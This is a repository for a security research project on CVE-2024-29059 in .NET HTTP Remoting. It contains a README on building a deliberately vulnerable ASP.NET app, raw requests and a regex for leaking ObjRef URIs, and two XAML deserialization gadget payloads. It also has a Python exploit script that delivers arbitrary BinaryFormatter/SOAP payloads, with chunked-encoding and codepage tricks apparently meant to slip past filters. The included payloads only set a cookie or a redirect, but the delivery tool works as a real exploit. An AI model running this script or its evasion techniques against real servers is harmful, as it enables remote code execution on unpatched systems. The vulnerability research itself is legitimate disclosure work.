├── DISCLAIMER.md
├── LICENSE
├── Payloads
├── AddHeader.binary
├── AddHeader.soap
├── RedirectLocation.binary
└── RedirectLocation.soap
├── README.md
├── RemoteApplicationMetadata.py
└── WebApplication452
├── ApplicationInsights.config
├── Properties
├── AssemblyInfo.cs
├── serviceDependencies.json
├── serviceDependencies.local.json
└── serviceDependencies.local.json.user
├── Web.Debug.config
├── Web.Release.config
├── Web.config
├── WebApplication452.csproj
├── WebApplication452.csproj.user
├── bin
└── ApplicationInsights.config
├── obj
└── Debug
│ ├── .NETFramework,Version=v4.5.2.AssemblyAttributes.cs
│ ├── DesignTimeResolveAssemblyReferencesInput.cache
│ └── WebApplication452.csproj.FileListAbsolute.txt
└── packages.config
/DISCLAIMER.md:
--------------------------------------------------------------------------------
1 | ### DISCLAIMER
2 |
3 | You expressly understand and agree that HttpRemotingObjRefLeak (creators and contributors) shall not be liable for any damages or losses resulting from your use of this tool or third-party products that use it.
4 |
5 | Creators aren't in charge of any and have/has no responsibility for any kind of:
6 |
7 | * Unlawful or illegal use of the tool
8 | * Legal or Law infringement (acted in any country, state, municipality, place) by third parties and users
9 | * Act against ethical and / or human moral, ethic, and peoples and cultures of the world
10 | * Malicious act, capable of causing damage to third parties, promoted or distributed by third parties or the user through this tool
11 |
12 | ### Contact
13 |
14 | Feel free to contact info@code-white.com for any questions.
15 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2018 Code White GmbH
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
--------------------------------------------------------------------------------
/Payloads/AddHeader.binary:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/codewhitesec/HttpRemotingObjRefLeak/185f4010ea6bf53814ed0fa60c05eddcf20c652a/Payloads/AddHeader.binary
--------------------------------------------------------------------------------
/Payloads/AddHeader.soap:
--------------------------------------------------------------------------------
1 |
2 |
3 | <ObjectDataProvider MethodName="AddHeader"
4 | xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
5 | xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
6 | xmlns:System="clr-namespace:System;assembly=mscorlib"
7 | xmlns:System.Web="clr-namespace:System.Web;assembly=System.Web"
8 | >
9 | <ObjectDataProvider.ObjectInstance>
10 | <ObjectDataProvider MethodName="get_Response">
11 | <ObjectDataProvider.ObjectInstance>
12 | <ObjectDataProvider ObjectType="{x:Type System.Web:HttpContext}" MethodName="get_Current" />
13 | </ObjectDataProvider.ObjectInstance>
14 | </ObjectDataProvider>
15 | </ObjectDataProvider.ObjectInstance>
16 | <ObjectDataProvider.MethodParameters>
17 | <System:String>Set-Cookie</System:String>
18 | <System:String>x=ad92afb4-00c3-4479-bab8-2425b5716081</System:String>
19 | </ObjectDataProvider.MethodParameters>
20 | </ObjectDataProvider>
21 |
22 |
--------------------------------------------------------------------------------
/Payloads/RedirectLocation.binary:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/codewhitesec/HttpRemotingObjRefLeak/185f4010ea6bf53814ed0fa60c05eddcf20c652a/Payloads/RedirectLocation.binary
--------------------------------------------------------------------------------
/Payloads/RedirectLocation.soap:
--------------------------------------------------------------------------------
1 |
2 |
3 | <ObjectDataProvider MethodName="set_RedirectLocation"
4 | xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
5 | xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
6 | xmlns:System="clr-namespace:System;assembly=mscorlib"
7 | xmlns:System.Web="clr-namespace:System.Web;assembly=System.Web"
8 | >
9 | <ObjectDataProvider.ObjectInstance>
10 | <ObjectDataProvider MethodName="get_Response">
11 | <ObjectDataProvider.ObjectInstance>
12 | <ObjectDataProvider ObjectType="{x:Type System.Web:HttpContext}" MethodName="get_Current" />
13 | </ObjectDataProvider.ObjectInstance>
14 | </ObjectDataProvider>
15 | </ObjectDataProvider.ObjectInstance>
16 | <ObjectDataProvider.MethodParameters>
17 | <System:String>/ad92afb4-00c3-4479-bab8-2425b5716081</System:String>
18 | </ObjectDataProvider.MethodParameters>
19 | </ObjectDataProvider>
20 |
21 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Leaking and Exploiting `ObjRef`s via HTTP .NET Remoting (CVE-2024-29059)
2 |
3 | This repository provides further details and resources on the [CODE WHITE blog post of the same name *Leaking ObjRefs to Exploit HTTP .NET Remoting*](https://code-white.com/blog/leaking-objrefs-to-exploit-http-dotnet-remoting/):
4 |
5 | 1. Creating a vulnerable ASP.NET web application
6 | 2. Detecting `ObjRef` leaks
7 | 3. Example deserialization payloads that work under the `TypeFilterLevel.Low` restrictions
8 | 4. Exploit script for delivering the payloads
9 |
10 |
11 | ## 1. Creating a Vulnerable ASP.NET Web Application
12 |
13 | The following is based on [*Configure Application Insights for your ASP.NET website* by Microsoft](https://learn.microsoft.com/en-us/azure/azure-monitor/app/asp-net) and describes how to create a vulnerable ASP.NET web application with Visual Studio 2019 (required to target .NET Framework 4.5.2, you can still download it at ) and Microsoft Application Insights:
14 |
15 | 1. Open Visual Studio 2019.
16 | 2. Select **File** > **New** > **Project**.
17 | 3. Select **ASP.NET Web Application (.NET Framework) C#**, then **Next**.
18 | 4. Select **.NET Framework 4.5.2**, then **Create**.
19 | 5. Select **Empty**, then **Create**.
20 | 6. Select **Project** > **Add Application Insights Telemetry**.
21 | 7. Select **Application Insights SDK (local)**, then **Next**.
22 | 8. Check **NuGet packages**, then click **Finish**.
23 |
24 | If the .NET Framework updates of January 2024 are installed, open the `Web.config` file and add the following under [`/configuration/appSettings`](https://learn.microsoft.com/en-us/dotnet/framework/configure-apps/file-schema/appsettings/appsettings-element-for-configuration) to re-enable the vulnerable behavior:
25 |
26 | ```xml
27 |
28 | ```
29 |
30 | You can then run the web application via **Debug** > **Start Without Debugging** or by pressing Ctrl+F5.
31 |
32 |
33 | ## 2. Detecting `ObjRef` Leaks
34 |
35 | You can use the following requests to leak `ObjRef`s of `MarshalByRefObject` instances stored in the `LogicalCallContext`:
36 |
37 | - `BinaryServerFormatterSink`:
38 |
39 | ```
40 | GET /RemoteApplicationMetadata.rem?wsdl HTTP/1.0
41 | __RequestVerb: POST
42 | Content-Type: application/octet-stream
43 | ```
44 |
45 | - `SoapServerFormatterSink`:
46 |
47 | ```
48 | GET /RemoteApplicationMetadata.rem?wsdl HTTP/1.0
49 | __RequestVerb: POST
50 | Content-Type: text/xml
51 | ```
52 |
53 | Leaked `ObjRef` URIs can then be matched using the following regex:
54 |
55 | ```
56 | /[0-9a-f_]+/[0-9A-Za-z_+]+_\d+\.rem
57 | ```
58 |
59 |
60 | ## 3. Example Deserialization Payloads
61 |
62 | We have created two simple deserialization payloads based on the [*TextFormattingRunProperties* gadget of YSoSerial.Net](https://github.com/pwntester/ysoserial.net/blob/master/ysoserial/Generators/TextFormattingRunPropertiesGenerator.cs) with custom XAML payloads that work under the restrictions caused by `TypeFilterLevel.Low` to perform the following:
63 |
64 | - `HttpContext.Current.Response.AddHeader("Set-Cookie", "x=ad92afb4-00c3-4479-bab8-2425b5716081")`
65 | - `HttpContext.Current.Response.RedirectLocation = "/ad92afb4-00c3-4479-bab8-2425b5716081"`
66 |
67 | The HTTP headers can be observed in the server's response to the HTTP .NET Remoting request.
68 |
69 |
70 | ## 4. Exploit Script
71 |
72 | The `RemoteApplicationMetadata.py` script provides a way for leaking existing `ObjRef` and then using it in a subsequent request to deliver a given payload:
73 |
74 | ```
75 | usage: RemoteApplicationMetadata.py [-h] [-c] [--chunk-range CHUNK_RANGE] [-e] [-f {binary,soap}] [-u] [-v] url [file]
76 |
77 | positional arguments:
78 | url target URL (without `RemoteApplicationMetadata.rem`)
79 | file BinaryFormatter/SoapFormatter payload file (default: stdin)
80 |
81 | options:
82 | -h, --help show this help message and exit
83 | -c, --chunked use chunked Transfer-Encoding for request
84 | --chunk-range CHUNK_RANGE
85 | range to pick the chunk size from randomly, e. g., 1-10
86 | -e, --encoding apply a random non ASCII-based encoding on SOAP
87 | -f {binary,soap}, --format {binary,soap}
88 | targeted runtime serializer format (default: soap)
89 | -u, --use-generic-uri
90 | use the generic `RemoteApplicationMetadata.rem` also for the payload delivery request
91 | -v, --verbose print verbose info
92 | ```
93 |
94 | Example:
95 |
96 | ```
97 | ./RemoteApplicationMetadata.py -f binary https://127.0.0.1:44365 AddHeader.bin -u -v
98 | ```
99 |
--------------------------------------------------------------------------------
/RemoteApplicationMetadata.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 | import argparse
4 | import sys
5 | from urllib.parse import urljoin
6 | import requests
7 | import re
8 | import random
9 | import urllib3
10 |
11 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
12 |
13 | NON_ASCII_BASED_CODEPAGES = [ 37, 500, 875, 1026, 1140 ]
14 | SERIALIZER_FORMATS = { 'binary': 'application/octet-stream', 'soap': 'text/xml' }
15 | DEFAULT_SERIALIZER_FORMAT = 'soap'
16 |
17 | def parse_range(val):
18 | l, u = r = tuple([int(i) for i in val.split('-', 2)])
19 | if not 0 < l <= u:
20 | raise Exception('range "-" must comply with 0 < lower <= upper')
21 | return r
22 |
23 | def chunk_gen(data: bytes, chunk_range: (int,int)):
24 | min_size = max(chunk_range[0], 1)
25 | max_size = chunk_range[1]
26 | i = 0
27 | n = len(data)
28 | while i < n:
29 | r = random.randint(min_size, max_size)
30 | yield data[i:i+r]
31 | i += r
32 |
33 | def main(args):
34 | url = urljoin(args.url, '/RemoteApplicationMetadata.rem?wsdl')
35 | with requests.Session() as s:
36 | s.verify = False
37 | timeout = (5,5)
38 | content_type = SERIALIZER_FORMATS[args.format]
39 | headers = {
40 | 'Content-Type': content_type,
41 | '__RequestVerb': 'POST',
42 | }
43 | response = s.get(url, headers=headers, timeout=timeout, allow_redirects=False)
44 | content = response.content.decode('iso-8859-1')
45 | matches = re.findall(r'/[0-9a-f_]+/[0-9A-Za-z_+]+_\d+\.rem', content)
46 | if len(matches) > 0:
47 | objref_uri = matches[0]
48 | print('[+] Found ObjRef URI %s' % (objref_uri))
49 | if args.use_generic_uri:
50 | http_method = 'GET'
51 | headers['__RequestUri'] = objref_uri
52 | else:
53 | http_method = 'POST'
54 | url = urljoin(args.url, objref_uri)
55 | if args.verbose:
56 | print(f'[*] Reading payload from {args.file.name}')
57 | data = args.file.read()
58 | if args.format == 'soap':
59 | headers['SOAPAction'] = '""'
60 | if args.encoding:
61 | encoding = 'cp%03d' % (random.choice(NON_ASCII_BASED_CODEPAGES))
62 | if encoding is not None:
63 | data = ('' % (encoding)).encode('iso-8859-1') \
64 | + data.decode('iso-8859-1').encode(encoding)
65 | if args.chunked:
66 | data = chunk_gen(data, args.chunk_range)
67 | response = s.request(http_method, url, headers=headers, data=data, timeout=timeout, allow_redirects=False)
68 | if args.verbose:
69 | print(response)
70 | print(response.headers)
71 | print(response.content)
72 | else:
73 | print('[-] No ObjRef URI found')
74 |
75 |
76 | if __name__ == '__main__':
77 | parser = argparse.ArgumentParser()
78 | parser.add_argument('url', help='target URL (without `RemoteApplicationMetadata.rem`)')
79 | parser.add_argument('-c', '--chunked', action='store_true', default=False,
80 | help='use chunked Transfer-Encoding for request')
81 | parser.add_argument('--chunk-range', type=parse_range, default=(1,10),
82 | help='range from which the chunk size should be chosen randomly (e. g., 1-10)')
83 | parser.add_argument('-e', '--encoding', action='store_true', default=False,
84 | help='apply a random non ASCII-based encoding on SOAP')
85 | parser.add_argument('-f', '--format', choices=SERIALIZER_FORMATS.keys(), default=DEFAULT_SERIALIZER_FORMAT,
86 | help='targeted runtime serializer format (default: soap)')
87 | parser.add_argument('-u', '--use-generic-uri', action='store_true', default=False,
88 | help='use the generic `RemoteApplicationMetadata.rem` also for the payload delivery request')
89 | parser.add_argument('-v', '--verbose', action='store_true', default=False,
90 | help='print verbose info')
91 | parser.add_argument('file', nargs='?', type=argparse.FileType('rb'), default=sys.stdin,
92 | help='BinaryFormatter/SoapFormatter payload file (default: stdin)')
93 |
94 | main(parser.parse_args())
95 |
--------------------------------------------------------------------------------
/WebApplication452/ApplicationInsights.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
11 | search|spider|crawl|Bot|Monitor|AlwaysOn
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
30 | core.windows.net
31 | core.chinacloudapi.cn
32 | core.cloudapi.de
33 | core.usgovcloudapi.net
34 |
35 |
36 | Microsoft.Azure.EventHubs
37 | Microsoft.Azure.ServiceBus
38 |
39 |
40 |
41 |
58 |
59 |
60 |
61 |
62 |
89 |
90 |
91 |
92 |
93 |
95 |
96 |
97 |
98 |
103 | Microsoft.VisualStudio.Web.PageInspector.Runtime.Tracing.RequestDataHttpHandler
104 | System.Web.StaticFileHandler
105 | System.Web.Handlers.AssemblyResourceLoader
106 | System.Web.Optimization.BundleHandler
107 | System.Web.Script.Services.ScriptHandlerFactory
108 | System.Web.Handlers.TraceHandler
109 | System.Web.Services.Discovery.DiscoveryRequestHandler
110 | System.Web.HttpDebugHandler
111 |
112 |
113 |
114 |
115 |
116 |
117 |
118 |
119 |
120 |
121 |
122 |
123 | 5
124 | Event
125 |
126 |
127 | 5
128 | Event
129 |
130 |
131 |
132 |
133 |
134 |
140 |
--------------------------------------------------------------------------------
/WebApplication452/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("WebApplication452")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("WebApplication452")]
13 | [assembly: AssemblyCopyright("Copyright © 2024")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("6e8440f0-3a0e-4e93-a7ce-4ea5e4f12af6")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Revision and Build Numbers
33 | // by using the '*' as shown below:
34 | [assembly: AssemblyVersion("1.0.0.0")]
35 | [assembly: AssemblyFileVersion("1.0.0.0")]
36 |
--------------------------------------------------------------------------------
/WebApplication452/Properties/serviceDependencies.json:
--------------------------------------------------------------------------------
1 | {
2 | "dependencies": {
3 | "appInsights1": {
4 | "type": "appInsights"
5 | }
6 | }
7 | }
--------------------------------------------------------------------------------
/WebApplication452/Properties/serviceDependencies.local.json:
--------------------------------------------------------------------------------
1 | {
2 | "dependencies": {
3 | "appInsights1": {
4 | "type": "appInsights.sdk"
5 | }
6 | }
7 | }
--------------------------------------------------------------------------------
/WebApplication452/Properties/serviceDependencies.local.json.user:
--------------------------------------------------------------------------------
1 | {
2 | "dependencies": {
3 | "appInsights1": {
4 | "restored": true,
5 | "restoreTime": "2024-03-06T13:27:48.4277025Z"
6 | }
7 | },
8 | "parameters": {}
9 | }
--------------------------------------------------------------------------------
/WebApplication452/Web.Debug.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
17 |
18 |
29 |
30 |
--------------------------------------------------------------------------------
/WebApplication452/Web.Release.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
17 |
18 |
19 |
30 |
31 |
--------------------------------------------------------------------------------
/WebApplication452/Web.config:
--------------------------------------------------------------------------------
1 |
2 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
--------------------------------------------------------------------------------
/WebApplication452/WebApplication452.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 |
8 |
9 | 2.0
10 | {6E8440F0-3A0E-4E93-A7CE-4EA5E4F12AF6}
11 | {349c5851-65df-11da-9384-00065b846f21};{fae04ec0-301f-11d3-bf4b-00c04f79efbc}
12 | Library
13 | Properties
14 | WebApplication452
15 | WebApplication452
16 | v4.5.2
17 | true
18 |
19 | 44365
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 | true
29 | full
30 | false
31 | bin\
32 | DEBUG;TRACE
33 | prompt
34 | 4
35 |
36 |
37 | true
38 | pdbonly
39 | true
40 | bin\
41 | TRACE
42 | prompt
43 | 4
44 |
45 |
46 |
47 | ..\packages\Microsoft.ApplicationInsights.Agent.Intercept.2.4.0\lib\net45\Microsoft.AI.Agent.Intercept.dll
48 |
49 |
50 | ..\packages\Microsoft.ApplicationInsights.DependencyCollector.2.15.0\lib\net452\Microsoft.AI.DependencyCollector.dll
51 |
52 |
53 | ..\packages\Microsoft.ApplicationInsights.PerfCounterCollector.2.15.0\lib\net452\Microsoft.AI.PerfCounterCollector.dll
54 |
55 |
56 | ..\packages\Microsoft.ApplicationInsights.WindowsServer.TelemetryChannel.2.15.0\lib\net452\Microsoft.AI.ServerTelemetryChannel.dll
57 |
58 |
59 | ..\packages\Microsoft.ApplicationInsights.Web.2.15.0\lib\net452\Microsoft.AI.Web.dll
60 |
61 |
62 | ..\packages\Microsoft.ApplicationInsights.WindowsServer.2.15.0\lib\net452\Microsoft.AI.WindowsServer.dll
63 |
64 |
65 | ..\packages\Microsoft.ApplicationInsights.2.15.0\lib\net452\Microsoft.ApplicationInsights.dll
66 |
67 |
68 | ..\packages\Microsoft.AspNet.TelemetryCorrelation.1.0.8\lib\net45\Microsoft.AspNet.TelemetryCorrelation.dll
69 |
70 |
71 |
72 | ..\packages\System.Buffers.4.5.1\lib\netstandard1.1\System.Buffers.dll
73 |
74 |
75 | ..\packages\System.Diagnostics.DiagnosticSource.4.6.0\lib\net45\System.Diagnostics.DiagnosticSource.dll
76 |
77 |
78 |
79 | ..\packages\System.Memory.4.5.4\lib\netstandard1.1\System.Memory.dll
80 |
81 |
82 |
83 |
84 | ..\packages\System.Runtime.CompilerServices.Unsafe.4.5.3\lib\netstandard1.0\System.Runtime.CompilerServices.Unsafe.dll
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
99 |
100 |
101 |
102 |
103 |
104 |
105 | ..\packages\Microsoft.CodeDom.Providers.DotNetCompilerPlatform.2.0.1\lib\net45\Microsoft.CodeDom.Providers.DotNetCompilerPlatform.dll
106 |
107 |
108 |
109 |
110 |
111 |
112 |
113 |
114 |
115 |
116 |
117 |
118 | Web.config
119 |
120 |
121 | Web.config
122 |
123 |
124 |
125 | 10.0
126 | $(MSBuildExtensionsPath32)\Microsoft\VisualStudio\v$(VisualStudioVersion)
127 |
128 |
129 |
130 |
131 |
132 |
133 |
134 |
135 | True
136 | True
137 | 50886
138 | /
139 | https://localhost:44365/
140 | False
141 | False
142 |
143 |
144 | False
145 |
146 |
147 |
148 |
149 |
150 |
151 | This project references NuGet package(s) that are missing on this computer. Use NuGet Package Restore to download them. For more information, see http://go.microsoft.com/fwlink/?LinkID=322105. The missing file is {0}.
152 |
153 |
154 |
155 |
156 |
157 |
158 |
159 |
160 |
161 |
162 |
163 |
164 |
165 |
172 |
--------------------------------------------------------------------------------
/WebApplication452/WebApplication452.csproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | true
5 |
6 | 44365
7 |
8 |
9 |
10 |
11 | Debug|Any CPU
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 | CurrentPage
20 | True
21 | False
22 | False
23 | False
24 |
25 |
26 |
27 |
28 |
29 |
30 |
31 |
32 | True
33 | False
34 |
35 |
36 |
37 |
38 |
--------------------------------------------------------------------------------
/WebApplication452/bin/ApplicationInsights.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
11 | search|spider|crawl|Bot|Monitor|AlwaysOn
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
30 | core.windows.net
31 | core.chinacloudapi.cn
32 | core.cloudapi.de
33 | core.usgovcloudapi.net
34 |
35 |
36 | Microsoft.Azure.EventHubs
37 | Microsoft.Azure.ServiceBus
38 |
39 |
40 |
41 |
58 |
59 |
60 |
61 |
62 |
89 |
90 |
91 |
92 |
93 |
95 |
96 |
97 |
98 |
103 | Microsoft.VisualStudio.Web.PageInspector.Runtime.Tracing.RequestDataHttpHandler
104 | System.Web.StaticFileHandler
105 | System.Web.Handlers.AssemblyResourceLoader
106 | System.Web.Optimization.BundleHandler
107 | System.Web.Script.Services.ScriptHandlerFactory
108 | System.Web.Handlers.TraceHandler
109 | System.Web.Services.Discovery.DiscoveryRequestHandler
110 | System.Web.HttpDebugHandler
111 |
112 |
113 |
114 |
115 |
116 |
117 |
118 |
119 |
120 |
121 |
122 |
123 | 5
124 | Event
125 |
126 |
127 | 5
128 | Event
129 |
130 |
131 |
132 |
133 |
134 |
140 |
--------------------------------------------------------------------------------
/WebApplication452/obj/Debug/.NETFramework,Version=v4.5.2.AssemblyAttributes.cs:
--------------------------------------------------------------------------------
1 | //
2 | using System;
3 | using System.Reflection;
4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.5.2", FrameworkDisplayName = ".NET Framework 4.5.2")]
5 |
--------------------------------------------------------------------------------
/WebApplication452/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/codewhitesec/HttpRemotingObjRefLeak/185f4010ea6bf53814ed0fa60c05eddcf20c652a/WebApplication452/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache
--------------------------------------------------------------------------------
/WebApplication452/obj/Debug/WebApplication452.csproj.FileListAbsolute.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/codewhitesec/HttpRemotingObjRefLeak/185f4010ea6bf53814ed0fa60c05eddcf20c652a/WebApplication452/obj/Debug/WebApplication452.csproj.FileListAbsolute.txt
--------------------------------------------------------------------------------
/WebApplication452/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
--------------------------------------------------------------------------------